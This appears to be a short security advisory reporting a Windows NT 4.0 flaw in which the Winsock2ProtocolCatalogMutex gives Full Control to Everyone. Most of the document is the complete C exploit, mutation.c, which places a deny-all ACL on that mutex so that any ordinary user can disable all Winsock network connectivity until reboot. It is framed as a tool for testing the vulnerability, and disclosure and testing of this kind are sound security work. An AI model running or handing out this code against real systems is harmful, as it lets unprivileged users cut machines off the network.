‘Winsock Mutex vulnerability exploit code released’

Summary

‘There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to which the Everyone group has Full Control. Any user can change this to No Access, and that disables all network connectivity through Winsock until the system is rebooted. This has been reported in the past in our previous article: Winsock Mutex vulnerability (Patch available).
Now an exploit code is available to test for this vulnerability.’

Credit:

‘The information has been provided by Arne Vidstrom.’


Details

Exploit:
/*
/* mutation.c – (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/* http://ntsecurity.nu
/*
/* – Disables all network connectivity through Winsock
/* – Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
        PSID pEveryoneSID;
        SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
        PACL pDacl;
        DWORD sizeNeeded;

        AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0,
0, 0, 0, &pEveryoneSID);
        sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) – sizeof(DWORD);
        pDacl = (PACL) malloc(sizeNeeded);
        InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
        AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
        SetNamedSecurityInfo(‘Winsock2ProtocolCatalogMutex’,
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
        free(pDacl);
        return 0;
}’

Categories: Exploits